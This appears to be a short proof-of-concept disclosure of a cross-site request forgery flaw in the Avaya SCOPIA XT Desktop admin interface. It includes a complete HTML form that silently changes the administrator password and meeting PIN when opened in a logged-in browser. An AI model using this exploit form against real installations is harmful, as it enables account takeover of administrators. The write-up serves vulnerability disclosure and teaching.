This PoC will be describe how to explore Cross-Site Request (CSRF) Forgery on SCOPIA XT Desktop version 8.3.915.4
website: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.
On the "Directory and Authentication" page, the administrator is able to change his password.
Capturing the request with Burp Suite I could see that an anti-csrf token was not implemented and the only security mechanism is the session cookie.
I created this html file that served as a PoC to exploit the vulnerability presented.
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
When running it in the browser that has a valid cookie for the SCOPIA XT Desktop administration environment, it was possible to change the password of the user admin to "attacker":
